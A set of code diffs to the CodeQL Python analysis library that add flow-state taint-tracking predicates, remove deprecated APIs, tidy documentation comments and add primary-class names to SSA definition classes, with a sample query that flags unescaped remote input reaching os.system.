* Holds if taint propagation through nodes guarded by `guard` is prohibited
* when the flow state is `state`.
*/
predicate isSanitizerGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) { none() }
final override predicate isBarrierGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) {
this.isSanitizerGuard(guard, state)
}
/**
* Holds if taint may propagate from `node1` to `node2` in addition to the normal data-flow and taint steps.
*/
predicate isAdditionalTaintStep(DataFlow::Node node1, DataFlow::Node node2) { none() }
@@ -107,7 +143,25 @@ abstract class Configuration extends DataFlow::Configuration {
defaultAdditionalTaintStep(node1, node2)
}
override predicate allowImplicitRead(DataFlow::Node node, DataFlow::Content c) {
/**
* Holds if taint may propagate from `node1` to `node2` in addition to the normal data-flow and taint steps.
* This step is only applicable in `state1` and updates the flow state to `state2`.
*/
predicate isAdditionalTaintStep(
DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
DataFlow::FlowState state2
) {
none()
}
final override predicate isAdditionalFlowStep(
DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
DataFlow::FlowState state2
) {
this.isAdditionalTaintStep(node1, state1, node2, state2)
}
override predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c) {
(this.isSink(node) or this.isAdditionalTaintStep(node, _)) and
defaultImplicitTaintRead(node, c)
}

View File

@@ -64,13 +64,30 @@ abstract class Configuration extends DataFlow::Configuration {
override predicate isSource(DataFlow::Node source) { none() }
/**
* Holds if `sink` is a relevant taint sink.
* Holds if `source` is a relevant taint source with the given initial
* `state`.
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSource(DataFlow::Node source, DataFlow::FlowState state) { none() }
/**
* Holds if `sink` is a relevant taint sink
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSink(DataFlow::Node sink) { none() }
/**
* Holds if `sink` is a relevant taint sink accepting `state`.
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSink(DataFlow::Node sink, DataFlow::FlowState state) { none() }
/** Holds if the node `node` is a taint sanitizer. */
predicate isSanitizer(DataFlow::Node node) { none() }
@@ -79,6 +96,16 @@ abstract class Configuration extends DataFlow::Configuration {
defaultTaintSanitizer(node)
}
/**
* Holds if the node `node` is a taint sanitizer when the flow state is
* `state`.
*/
predicate isSanitizer(DataFlow::Node node, DataFlow::FlowState state) { none() }
final override predicate isBarrier(DataFlow::Node node, DataFlow::FlowState state) {
this.isSanitizer(node, state)
}
/** Holds if taint propagation into `node` is prohibited. */
predicate isSanitizerIn(DataFlow::Node node) { none() }
@@ -97,8 +124,17 @@ abstract class Configuration extends DataFlow::Configuration {
}
/**
* Holds if the additional taint propagation step from `node1` to `node2`
* must be taken into account in the analysis.
* Holds if taint propagation through nodes guarded by `guard` is prohibited
* when the flow state is `state`.
*/
predicate isSanitizerGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) { none() }
final override predicate isBarrierGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) {
this.isSanitizerGuard(guard, state)
}
/**
* Holds if taint may propagate from `node1` to `node2` in addition to the normal data-flow and taint steps.
*/
predicate isAdditionalTaintStep(DataFlow::Node node1, DataFlow::Node node2) { none() }
@@ -107,7 +143,25 @@ abstract class Configuration extends DataFlow::Configuration {
defaultAdditionalTaintStep(node1, node2)
}
override predicate allowImplicitRead(DataFlow::Node node, DataFlow::Content c) {
/**
* Holds if taint may propagate from `node1` to `node2` in addition to the normal data-flow and taint steps.
* This step is only applicable in `state1` and updates the flow state to `state2`.
*/
predicate isAdditionalTaintStep(
DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
DataFlow::FlowState state2
) {
none()
}
final override predicate isAdditionalFlowStep(
DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
DataFlow::FlowState state2
) {
this.isAdditionalTaintStep(node1, state1, node2, state2)
}
override predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c) {
(this.isSink(node) or this.isAdditionalTaintStep(node, _)) and
defaultImplicitTaintRead(node, c)
}

View File

@@ -64,13 +64,30 @@ abstract class Configuration extends DataFlow::Configuration {
override predicate isSource(DataFlow::Node source) { none() }
/**
* Holds if `sink` is a relevant taint sink.
* Holds if `source` is a relevant taint source with the given initial
* `state`.
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSource(DataFlow::Node source, DataFlow::FlowState state) { none() }
/**
* Holds if `sink` is a relevant taint sink
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSink(DataFlow::Node sink) { none() }
/**
* Holds if `sink` is a relevant taint sink accepting `state`.
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSink(DataFlow::Node sink, DataFlow::FlowState state) { none() }
/** Holds if the node `node` is a taint sanitizer. */
predicate isSanitizer(DataFlow::Node node) { none() }
@@ -79,6 +96,16 @@ abstract class Configuration extends DataFlow::Configuration {
defaultTaintSanitizer(node)
}
/**
* Holds if the node `node` is a taint sanitizer when the flow state is
* `state`.
*/
predicate isSanitizer(DataFlow::Node node, DataFlow::FlowState state) { none() }
final override predicate isBarrier(DataFlow::Node node, DataFlow::FlowState state) {
this.isSanitizer(node, state)
}
/** Holds if taint propagation into `node` is prohibited. */
predicate isSanitizerIn(DataFlow::Node node) { none() }
@@ -97,8 +124,17 @@ abstract class Configuration extends DataFlow::Configuration {
}
/**
* Holds if the additional taint propagation step from `node1` to `node2`
* must be taken into account in the analysis.
* Holds if taint propagation through nodes guarded by `guard` is prohibited
* when the flow state is `state`.
*/
predicate isSanitizerGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) { none() }
final override predicate isBarrierGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) {
this.isSanitizerGuard(guard, state)
}
/**
* Holds if taint may propagate from `node1` to `node2` in addition to the normal data-flow and taint steps.
*/
predicate isAdditionalTaintStep(DataFlow::Node node1, DataFlow::Node node2) { none() }
@@ -107,7 +143,25 @@ abstract class Configuration extends DataFlow::Configuration {
defaultAdditionalTaintStep(node1, node2)
}
override predicate allowImplicitRead(DataFlow::Node node, DataFlow::Content c) {
/**
* Holds if taint may propagate from `node1` to `node2` in addition to the normal data-flow and taint steps.
* This step is only applicable in `state1` and updates the flow state to `state2`.
*/
predicate isAdditionalTaintStep(
DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
DataFlow::FlowState state2
) {
none()
}
final override predicate isAdditionalFlowStep(
DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
DataFlow::FlowState state2
) {
this.isAdditionalTaintStep(node1, state1, node2, state2)
}
override predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c) {
(this.isSink(node) or this.isAdditionalTaintStep(node, _)) and
defaultImplicitTaintRead(node, c)
}

View File

@@ -64,13 +64,30 @@ abstract class Configuration extends DataFlow::Configuration {
override predicate isSource(DataFlow::Node source) { none() }
/**
* Holds if `sink` is a relevant taint sink.
* Holds if `source` is a relevant taint source with the given initial
* `state`.
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSource(DataFlow::Node source, DataFlow::FlowState state) { none() }
/**
* Holds if `sink` is a relevant taint sink
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSink(DataFlow::Node sink) { none() }
/**
* Holds if `sink` is a relevant taint sink accepting `state`.
*
* The smaller this predicate is, the faster `hasFlow()` will converge.
*/
// overridden to provide taint-tracking specific qldoc
override predicate isSink(DataFlow::Node sink, DataFlow::FlowState state) { none() }
/** Holds if the node `node` is a taint sanitizer. */
predicate isSanitizer(DataFlow::Node node) { none() }
@@ -79,6 +96,16 @@ abstract class Configuration extends DataFlow::Configuration {
defaultTaintSanitizer(node)
}
/**
* Holds if the node `node` is a taint sanitizer when the flow state is
* `state`.
*/
predicate isSanitizer(DataFlow::Node node, DataFlow::FlowState state) { none() }
final override predicate isBarrier(DataFlow::Node node, DataFlow::FlowState state) {
this.isSanitizer(node, state)
}
/** Holds if taint propagation into `node` is prohibited. */
predicate isSanitizerIn(DataFlow::Node node) { none() }
@@ -97,8 +124,17 @@ abstract class Configuration extends DataFlow::Configuration {
}
/**
* Holds if the additional taint propagation step from `node1` to `node2`
* must be taken into account in the analysis.
* Holds if taint propagation through nodes guarded by `guard` is prohibited
* when the flow state is `state`.
*/
predicate isSanitizerGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) { none() }
final override predicate isBarrierGuard(DataFlow::BarrierGuard guard, DataFlow::FlowState state) {
this.isSanitizerGuard(guard, state)
}
/**
* Holds if taint may propagate from `node1` to `node2` in addition to the normal data-flow and taint steps.
*/
predicate isAdditionalTaintStep(DataFlow::Node node1, DataFlow::Node node2) { none() }
@@ -107,7 +143,25 @@ abstract class Configuration extends DataFlow::Configuration {
defaultAdditionalTaintStep(node1, node2)
}
override predicate allowImplicitRead(DataFlow::Node node, DataFlow::Content c) {
/**
* Holds if taint may propagate from `node1` to `node2` in addition to the normal data-flow and taint steps.
* This step is only applicable in `state1` and updates the flow state to `state2`.
*/
predicate isAdditionalTaintStep(
DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
DataFlow::FlowState state2
) {
none()
}
final override predicate isAdditionalFlowStep(
DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
DataFlow::FlowState state2
) {
this.isAdditionalTaintStep(node1, state1, node2, state2)
}
override predicate allowImplicitRead(DataFlow::Node node, DataFlow::ContentSet c) {
(this.isSink(node) or this.isAdditionalTaintStep(node, _)) and
defaultImplicitTaintRead(node, c)
}
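
As a rough illustration of the flow-state aware predicates introduced above, the sketch below shows how a concrete query might use them. The choices of source, sink and state-changing step are purely illustrative assumptions and not part of this change: remote input starts in a "raw" state, a call to `html.escape` moves it to "escaped", and only values that are still "raw" are reported at an `os.system` sink.

import python
import semmle.python.dataflow.new.DataFlow
import semmle.python.dataflow.new.TaintTracking
import semmle.python.dataflow.new.RemoteFlowSources
import semmle.python.ApiGraphs

class StatefulConfig extends TaintTracking::Configuration {
  StatefulConfig() { this = "StatefulConfig" }

  override predicate isSource(DataFlow::Node source, DataFlow::FlowState state) {
    // any remote input starts out in the "raw" state
    source instanceof RemoteFlowSource and state = "raw"
  }

  override predicate isAdditionalTaintStep(
    DataFlow::Node node1, DataFlow::FlowState state1, DataFlow::Node node2,
    DataFlow::FlowState state2
  ) {
    // passing through `html.escape` keeps the taint but changes its state
    state1 = "raw" and
    state2 = "escaped" and
    exists(DataFlow::CallCfgNode call |
      call = API::moduleImport("html").getMember("escape").getACall() and
      node1 = call.getArg(0) and
      node2 = call
    )
  }

  override predicate isSink(DataFlow::Node sink, DataFlow::FlowState state) {
    // only data that is still "raw" when it reaches the sink is reported
    state = "raw" and
    exists(DataFlow::CallCfgNode osSystem |
      osSystem = API::moduleImport("os").getMember("system").getACall() and
      sink = osSystem.getArg(0)
    )
  }
}

from StatefulConfig cfg, DataFlow::Node source, DataFlow::Node sink
where cfg.hasFlow(source, sink)
select sink, "Unescaped remote input reaches this call."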

View File

@@ -119,16 +119,6 @@ module TaintTracking {
this.(TaintTrackingImplementation).hasFlowPath(src, sink)
}
/* Old query API */
/* deprecated */
deprecated predicate hasFlow(Source src, Sink sink) {
exists(PathSource psrc, PathSink psink |
this.hasFlowPath(psrc, psink) and
src = psrc.getNode().asCfgNode() and
sink = psink.getNode().asCfgNode()
)
}
/* New query API */
predicate hasSimpleFlow(DataFlow::Node src, DataFlow::Node sink) {
exists(PathSource psrc, PathSink psink |

View File

@@ -79,7 +79,7 @@ abstract class AttributePath extends TAttributePath {
predicate noAttribute() { this = TNoAttribute() }
}
/** AttributePath for no attribute. */
/** The `AttributePath` for no attribute. */
class NoAttribute extends TNoAttribute, AttributePath {
override string toString() { result = "no attribute" }
@@ -88,7 +88,7 @@ class NoAttribute extends TNoAttribute, AttributePath {
override AttributePath fromAttribute(string name) { none() }
}
/** AttributePath for an attribute. */
/** The `AttributePath` for an attribute. */
class NamedAttributePath extends TAttribute, AttributePath {
override string toString() {
exists(string attr |
@@ -124,8 +124,8 @@ newtype TTaintTrackingNode =
}
/**
* Class representing the (node, context, path, kind) tuple.
* Used for context-sensitive path-aware taint-tracking.
* A class representing the (node, context, path, kind) tuple.
* Used for context-sensitive path-aware taint-tracking.
*/
class TaintTrackingNode extends TTaintTrackingNode {
/** Gets a textual representation of this element. */
@@ -900,22 +900,6 @@ private class EssaTaintTracking extends string {
or
result = this.testEvaluates(defn, not_operand(test), use, src).booleanNot()
}
/**
* Holds if `test` is the test in a branch and `use` is that test
* with all the `not` prefixes removed.
*/
private predicate boolean_filter(ControlFlowNode test, ControlFlowNode use) {
any(PyEdgeRefinement ref).getTest() = test and
(
use = test
or
exists(ControlFlowNode notuse |
this.boolean_filter(test, notuse) and
use = not_operand(notuse)
)
)
}
}
private predicate testEvaluatesMaybe(ControlFlowNode test, ControlFlowNode use) {
@@ -991,7 +975,7 @@ int iterable_unpacking_descent(SequenceNode left_parent, ControlFlowNode left_de
}
module Implementation {
/* A call that returns a copy (or similar) of the argument */
/** Holds if `tonode` is a call that returns a copy (or similar) of the argument `fromnode` */
predicate copyCall(ControlFlowNode fromnode, CallNode tonode) {
tonode.getFunction().(AttrNode).getObject("copy") = fromnode
or
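
For reference, a minimal sketch of how the documented `copyCall` predicate might be exercised directly, assuming the module is importable as `semmle.python.dataflow.Implementation` (the path used by the legacy imports elsewhere in this listing):

import python
import semmle.python.dataflow.Implementation

// list calls that the legacy taint-tracking implementation treats as
// returning a copy (or similar) of their argument, such as `x.copy()`
from ControlFlowNode fromnode, CallNode tonode
where Implementation::copyCall(fromnode, tonode)
select tonode, fromnode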

View File

@@ -2,24 +2,7 @@ import semmle.python.dataflow.TaintTracking
private import semmle.python.objects.ObjectInternal
import semmle.python.dataflow.Implementation
/* For backwards compatibility -- Use `TaintTrackingContext` instead. */
deprecated class CallContext extends TaintTrackingContext {
TaintTrackingContext getCallee(CallNode call) { result.getCaller(call) = this }
predicate appliesToScope(Scope s) {
exists(PythonFunctionObjectInternal func, TaintKind param, AttributePath path, int n |
this = TParamContext(param, path, n) and
exists(TaintTrackingImplementation impl |
impl.callWithTaintedArgument(_, _, _, func, n, path, param) and
s = func.getScope()
)
)
or
this.isTop()
}
}
/* Backwards compatibility with config-less taint-tracking */
/** A configuration that provides backwards compatibility with config-less taint-tracking */
private class LegacyConfiguration extends TaintTracking::Configuration {
LegacyConfiguration() {
/* A name that won't be accidentally chosen by users */

View File

@@ -9,7 +9,6 @@
*/
import python
private import semmle.python.pointsto.Base
private import semmle.python.pointsto.PointsTo
private import semmle.python.pointsto.PointsToContext
private import semmle.python.objects.ObjectInternal
@@ -46,14 +45,14 @@ abstract class TrackableState extends string {
/**
* Holds if state starts at `f`.
* Either this predicate or `startsAt(ControlFlowNode f, Context ctx)`
* should be overriden by sub-classes.
* should be overridden by sub-classes.
*/
predicate startsAt(ControlFlowNode f) { none() }
/**
* Holds if state starts at `f` given context `ctx`.
* Either this predicate or `startsAt(ControlFlowNode f)`
* should be overriden by sub-classes.
* should be overridden by sub-classes.
*/
pragma[noinline]
predicate startsAt(ControlFlowNode f, Context ctx) { ctx.appliesTo(f) and this.startsAt(f) }
@@ -61,14 +60,14 @@ abstract class TrackableState extends string {
/**
* Holds if state ends at `f`.
* Either this predicate or `endsAt(ControlFlowNode f, Context ctx)`
* may be overriden by sub-classes.
* may be overridden by sub-classes.
*/
predicate endsAt(ControlFlowNode f) { none() }
/**
* Holds if state ends at `f` given context `ctx`.
* Either this predicate or `endsAt(ControlFlowNode f)`
* may be overriden by sub-classes.
* may be overridden by sub-classes.
*/
pragma[noinline]
predicate endsAt(ControlFlowNode f, Context ctx) { ctx.appliesTo(f) and this.endsAt(f) }

View File

@@ -138,9 +138,6 @@ abstract class TaintKind extends string {
exists(TaintedNode n | n.getTaintKind() = this and n.getCfgNode() = expr)
}
/** DEPRECATED -- Use getType() instead */
deprecated ClassObject getClass() { none() }
/**
* Gets the class of this kind of taint.
* For example, if this were a kind of string taint
@@ -180,7 +177,7 @@ abstract class TaintKind extends string {
}
/**
* Alias of `TaintKind`, so the two types can be used interchangeably.
* An alias of `TaintKind`, so the two types can be used interchangeably.
*/
class FlowLabel = TaintKind;
@@ -561,7 +558,7 @@ module DataFlowExtension {
ControlFlowNode getACalleeSuccessorNode(CallNode call) { none() }
}
/** Data flow variable that modifies the basic data-flow. */
/** A data flow variable that modifies the basic data-flow. */
class DataFlowVariable extends EssaVariable {
/**
* Gets a successor node for data-flow.
@@ -608,49 +605,11 @@ private import semmle.python.pointsto.PointsTo
*/
module DataFlow {
/**
* Generic taint kind, source and sink classes for convenience and
* The generic taint kind, source and sink classes for convenience and
* compatibility with other language libraries
*/
class Extension = DataFlowExtension::DataFlowNode;
abstract deprecated class Configuration extends string {
bindingset[this]
Configuration() { this = this }
abstract predicate isSource(ControlFlowNode source);
abstract predicate isSink(ControlFlowNode sink);
private predicate hasFlowPath(TaintedNode source, TaintedNode sink) {
source.getConfiguration() = this and
this.isSource(source.getCfgNode()) and
this.isSink(sink.getCfgNode()) and
source.flowsTo(sink)
}
predicate hasFlow(ControlFlowNode source, ControlFlowNode sink) {
exists(TaintedNode psource, TaintedNode psink |
psource.getCfgNode() = source and
psink.getCfgNode() = sink and
this.isSource(source) and
this.isSink(sink) and
this.hasFlowPath(psource, psink)
)
}
}
deprecated private class ConfigurationAdapter extends TaintTracking::Configuration instanceof Configuration {
override predicate isSource(DataFlow::Node node, TaintKind kind) {
Configuration.super.isSource(node.asCfgNode()) and
kind instanceof DataFlowType
}
override predicate isSink(DataFlow::Node node, TaintKind kind) {
Configuration.super.isSink(node.asCfgNode()) and
kind instanceof DataFlowType
}
}
private newtype TDataFlowNode =
TEssaNode(EssaVariable var) or
TCfgNode(ControlFlowNode node)
@@ -670,9 +629,6 @@ module DataFlow {
abstract Location getLocation();
AstNode asAstNode() { result = this.asCfgNode().getNode() }
/** For backwards compatibility -- Use asAstNode() instead */
deprecated AstNode getNode() { result = this.asAstNode() }
}
class CfgNode extends Node, TCfgNode {
@@ -709,9 +665,10 @@ module DataFlow {
}
deprecated private class DataFlowType extends TaintKind {
// this only exists to avoid an empty recursion error in the type checker
DataFlowType() {
this = "Data flow" and
exists(DataFlow::Configuration c)
1 = 2
}
}

View File

@@ -158,13 +158,13 @@ private predicate defn_of_instance_attribute(Assign asgn, Class c, string name)
)
}
/* Whether asgn defines an attribute of a class */
/** Holds if asgn defines an attribute of a class */
private predicate defn_of_class_attribute(Assign asgn, Class c, string name) {
asgn.getScope() = c and
asgn.getATarget().(Name).getId() = name
}
/* Holds if `value` is a value assigned to the `name`d attribute of module `m`. */
/** Holds if `value` is a value assigned to the `name`d attribute of module `m`. */
private predicate defn_of_module_attribute(ControlFlowNode value, Module m, string name) {
exists(DefinitionNode def |
def.getScope() = m and

View File

@@ -5,6 +5,7 @@
import python
private import SsaCompute
import semmle.python.essa.Definitions
private import semmle.python.internal.CachedStages
/** An (enhanced) SSA variable derived from `SsaSourceVariable`. */
class EssaVariable extends TEssaDefinition {
@@ -134,7 +135,7 @@ private newtype TEssaDefinition =
TPhiFunction(SsaSourceVariable v, BasicBlock b) { EssaDefinitions::phiNode(v, b) }
/**
* Definition of an extended-SSA (ESSA) variable.
* A definition of an extended-SSA (ESSA) variable.
* There is exactly one definition for each variable,
* and exactly one variable for each definition.
*/
@@ -171,6 +172,9 @@ abstract class EssaDefinition extends TEssaDefinition {
EssaVariable getVariable() { result.getDefinition() = this }
abstract BasicBlock getBasicBlock();
/** Gets the name of the primary QL class for this element. */
string getAPrimaryQlClass() { result = "EssaDefinition" }
}
/**
@@ -216,13 +220,15 @@ class EssaEdgeRefinement extends EssaDefinition, TEssaEdgeDefinition {
}
override string getRepresentation() {
result = this.getAQlClass() + "(" + this.getInput().getRepresentation() + ")"
result = this.getAPrimaryQlClass() + "(" + this.getInput().getRepresentation() + ")"
}
/** Gets the scope of the variable defined by this definition. */
override Scope getScope() { result = this.getPredecessor().getScope() }
override BasicBlock getBasicBlock() { result = this.getSuccessor() }
override string getAPrimaryQlClass() { result = "EssaEdgeRefinement" }
}
/** A Phi-function as specified in classic SSA form. */
@@ -265,6 +271,7 @@ class PhiFunction extends EssaDefinition, TPhiFunction {
/** Gets the input variable for this phi node on the edge `pred` -> `this.getBasicBlock()`, if any. */
cached
EssaVariable getInput(BasicBlock pred) {
Stages::AST::ref() and
result.getDefinition() = this.reachingDefinition(pred)
or
result.getDefinition() = this.inputEdgeRefinement(pred)
@@ -366,6 +373,8 @@ class PhiFunction extends EssaDefinition, TPhiFunction {
)
)
}
override string getAPrimaryQlClass() { result = "PhiFunction" }
}
/**
@@ -396,7 +405,7 @@ class EssaNodeDefinition extends EssaDefinition, TEssaNodeDefinition {
override Location getLocation() { result = this.getDefiningNode().getLocation() }
override string getRepresentation() { result = this.getAQlClass() }
override string getRepresentation() { result = this.getAPrimaryQlClass() }
override Scope getScope() {
exists(BasicBlock defb |
@@ -414,6 +423,8 @@ class EssaNodeDefinition extends EssaDefinition, TEssaNodeDefinition {
}
override BasicBlock getBasicBlock() { result = this.getDefiningNode().getBasicBlock() }
override string getAPrimaryQlClass() { result = "EssaNodeDefinition" }
}
/** A definition of an ESSA variable that takes another ESSA variable as an input. */
@@ -448,10 +459,10 @@ class EssaNodeRefinement extends EssaDefinition, TEssaNodeRefinement {
override Location getLocation() { result = this.getDefiningNode().getLocation() }
override string getRepresentation() {
result = this.getAQlClass() + "(" + this.getInput().getRepresentation() + ")"
result = this.getAPrimaryQlClass() + "(" + this.getInput().getRepresentation() + ")"
or
not exists(this.getInput()) and
result = this.getAQlClass() + "(" + this.getSourceVariable().getName() + "??)"
result = this.getAPrimaryQlClass() + "(" + this.getSourceVariable().getName() + "??)"
}
override Scope getScope() {
@@ -470,6 +481,8 @@ class EssaNodeRefinement extends EssaDefinition, TEssaNodeRefinement {
}
override BasicBlock getBasicBlock() { result = this.getDefiningNode().getBasicBlock() }
override string getAPrimaryQlClass() { result = "EssaNodeRefinement" }
}
pragma[noopt]
@@ -483,26 +496,22 @@ private EssaVariable potential_input(EssaNodeRefinement ref) {
)
}
/* For backwards compatibility */
deprecated class PyNodeDefinition = EssaNodeDefinition;
/* For backwards compatibility */
deprecated class PyNodeRefinement = EssaNodeRefinement;
/** An assignment to a variable `v = val` */
class AssignmentDefinition extends EssaNodeDefinition {
ControlFlowNode value;
AssignmentDefinition() {
SsaSource::assignment_definition(this.getSourceVariable(), this.getDefiningNode(), _)
SsaSource::assignment_definition(this.getSourceVariable(), this.getDefiningNode(), value)
}
ControlFlowNode getValue() {
SsaSource::assignment_definition(this.getSourceVariable(), this.getDefiningNode(), result)
}
ControlFlowNode getValue() { result = value }
override string getRepresentation() { result = this.getValue().getNode().toString() }
override string getAPrimaryQlClass() { result = "AssignmentDefinition" }
}
/** Capture of a raised exception `except ExceptionType ex:` */
/** A capture of a raised exception `except ExceptionType ex:` */
class ExceptionCapture extends EssaNodeDefinition {
ExceptionCapture() {
SsaSource::exception_capture(this.getSourceVariable(), this.getDefiningNode())
@@ -516,6 +525,8 @@ class ExceptionCapture extends EssaNodeDefinition {
}
override string getRepresentation() { result = "except " + this.getSourceVariable().getName() }
override string getAPrimaryQlClass() { result = "ExceptionCapture" }
}
/** An assignment to a variable as part of a multiple assignment `..., v, ... = val` */
@@ -536,6 +547,8 @@ class MultiAssignmentDefinition extends EssaNodeDefinition {
SsaSource::multi_assignment_definition(this.getSourceVariable(), this.getDefiningNode(), index,
lhs)
}
override string getAPrimaryQlClass() { result = "MultiAssignmentDefinition" }
}
/** A definition of a variable in a `with` statement */
@@ -543,6 +556,8 @@ class WithDefinition extends EssaNodeDefinition {
WithDefinition() { SsaSource::with_definition(this.getSourceVariable(), this.getDefiningNode()) }
override string getRepresentation() { result = "with" }
override string getAPrimaryQlClass() { result = "WithDefinition" }
}
/** A definition of a variable via a capture pattern */
@@ -552,6 +567,8 @@ class PatternCaptureDefinition extends EssaNodeDefinition {
}
override string getRepresentation() { result = "pattern capture" }
override string getAPrimaryQlClass() { result = "PatternCaptureDefinition" }
}
/** A definition of a variable via a pattern alias */
@@ -561,6 +578,8 @@ class PatternAliasDefinition extends EssaNodeDefinition {
}
override string getRepresentation() { result = "pattern alias" }
override string getAPrimaryQlClass() { result = "PatternAliasDefinition" }
}
/** A definition of a variable by declaring it as a parameter */
@@ -594,6 +613,8 @@ class ParameterDefinition extends EssaNodeDefinition {
/** Gets the `Parameter` this `ParameterDefinition` represents. */
Parameter getParameter() { result = this.getDefiningNode().getNode() }
override string getAPrimaryQlClass() { result = "ParameterDefinition" }
}
/** A deletion of a variable `del v` */
@@ -601,10 +622,12 @@ class DeletionDefinition extends EssaNodeDefinition {
DeletionDefinition() {
SsaSource::deletion_definition(this.getSourceVariable(), this.getDefiningNode())
}
override string getAPrimaryQlClass() { result = "DeletionDefinition" }
}
/**
* Definition of variable at the entry of a scope. Usually this represents the transfer of
* A definition of a variable at the entry of a scope. Usually this represents the transfer of
* a global or non-local variable from one scope to another.
*/
class ScopeEntryDefinition extends EssaNodeDefinition {
@@ -614,16 +637,20 @@ class ScopeEntryDefinition extends EssaNodeDefinition {
}
override Scope getScope() { result.getEntryNode() = this.getDefiningNode() }
override string getAPrimaryQlClass() { result = "ScopeEntryDefinition" }
}
/** Possible redefinition of variable via `from ... import *` */
/** A possible redefinition of a variable via `from ... import *` */
class ImportStarRefinement extends EssaNodeRefinement {
ImportStarRefinement() {
SsaSource::import_star_refinement(this.getSourceVariable(), _, this.getDefiningNode())
}
override string getAPrimaryQlClass() { result = "ImportStarRefinement" }
}
/** Assignment of an attribute `obj.attr = val` */
/** An assignment of an attribute `obj.attr = val` */
class AttributeAssignment extends EssaNodeRefinement {
AttributeAssignment() {
SsaSource::attribute_assignment_refinement(this.getSourceVariable(), _, this.getDefiningNode())
@@ -635,12 +662,16 @@ class AttributeAssignment extends EssaNodeRefinement {
override string getRepresentation() {
result =
this.getAQlClass() + " '" + this.getName() + "'(" + this.getInput().getRepresentation() + ")"
this.getAPrimaryQlClass() + " '" + this.getName() + "'(" + this.getInput().getRepresentation()
+ ")"
or
not exists(this.getInput()) and
result =
this.getAQlClass() + " '" + this.getName() + "'(" + this.getSourceVariable().getName() + "??)"
this.getAPrimaryQlClass() + " '" + this.getName() + "'(" + this.getSourceVariable().getName() +
"??)"
}
override string getAPrimaryQlClass() { result = "AttributeAssignment" }
}
/** A use of a variable as an argument, `foo(v)`, which might modify the object referred to. */
@@ -654,15 +685,19 @@ class ArgumentRefinement extends EssaNodeRefinement {
ControlFlowNode getArgument() { result = argument }
CallNode getCall() { result = this.getDefiningNode() }
override string getAPrimaryQlClass() { result = "ArgumentRefinement" }
}
/** Deletion of an attribute `del obj.attr`. */
/** A deletion of an attribute `del obj.attr`. */
class EssaAttributeDeletion extends EssaNodeRefinement {
EssaAttributeDeletion() {
SsaSource::attribute_deletion_refinement(this.getSourceVariable(), _, this.getDefiningNode())
}
string getName() { result = this.getDefiningNode().(AttrNode).getName() }
override string getAPrimaryQlClass() { result = "EssaAttributeDeletion" }
}
/** A pi-node (guard) with only one successor. */
@@ -690,10 +725,12 @@ class SingleSuccessorGuard extends EssaNodeRefinement {
test = this.getDefiningNode() and
SsaSource::test_refinement(this.getSourceVariable(), use, test)
}
override string getAPrimaryQlClass() { result = "SingleSuccessorGuard" }
}
/**
* Implicit definition of the names of sub-modules in a package.
* An implicit definition of the names of sub-modules in a package.
* Although the interpreter does not pre-define these names, merely populating them
* as they are imported, this is a good approximation for static analysis.
*/
@@ -701,11 +738,13 @@ class ImplicitSubModuleDefinition extends EssaNodeDefinition {
ImplicitSubModuleDefinition() {
SsaSource::init_module_submodule_defn(this.getSourceVariable(), this.getDefiningNode())
}
override string getAPrimaryQlClass() { result = "ImplicitSubModuleDefinition" }
}
/** An implicit (possible) definition of an escaping variable at a call-site */
class CallsiteRefinement extends EssaNodeRefinement {
override string toString() { result = "CallsiteRefinement" }
override string toString() { result = "CallSiteRefinement" }
CallsiteRefinement() {
exists(SsaSourceVariable var, ControlFlowNode defn |
@@ -718,24 +757,31 @@ class CallsiteRefinement extends EssaNodeRefinement {
}
CallNode getCall() { this.getDefiningNode() = result }
override string getAPrimaryQlClass() { result = "CallsiteRefinement" }
}
/** An implicit (possible) modification of the object referred at a method call */
class MethodCallsiteRefinement extends EssaNodeRefinement {
MethodCallsiteRefinement() {
SsaSource::method_call_refinement(this.getSourceVariable(), _, this.getDefiningNode()) and
SsaSource::method_call_refinement(pragma[only_bind_into](this.getSourceVariable()), _,
this.getDefiningNode()) and
not this instanceof SingleSuccessorGuard
}
CallNode getCall() { this.getDefiningNode() = result }
override string getAPrimaryQlClass() { result = "MethodCallsiteRefinement" }
}
/** An implicit (possible) modification of `self` at a method call */
class SelfCallsiteRefinement extends MethodCallsiteRefinement {
SelfCallsiteRefinement() { this.getSourceVariable().(Variable).isSelf() }
override string getAPrimaryQlClass() { result = "SelfCallsiteRefinement" }
}
/** Python specific sub-class of generic EssaEdgeRefinement */
/** A Python-specific sub-class of the generic EssaEdgeRefinement */
class PyEdgeRefinement extends EssaEdgeRefinement {
override string getRepresentation() {
/*
@@ -750,4 +796,6 @@ class PyEdgeRefinement extends EssaEdgeRefinement {
}
ControlFlowNode getTest() { result = this.getPredecessor().getLastNode() }
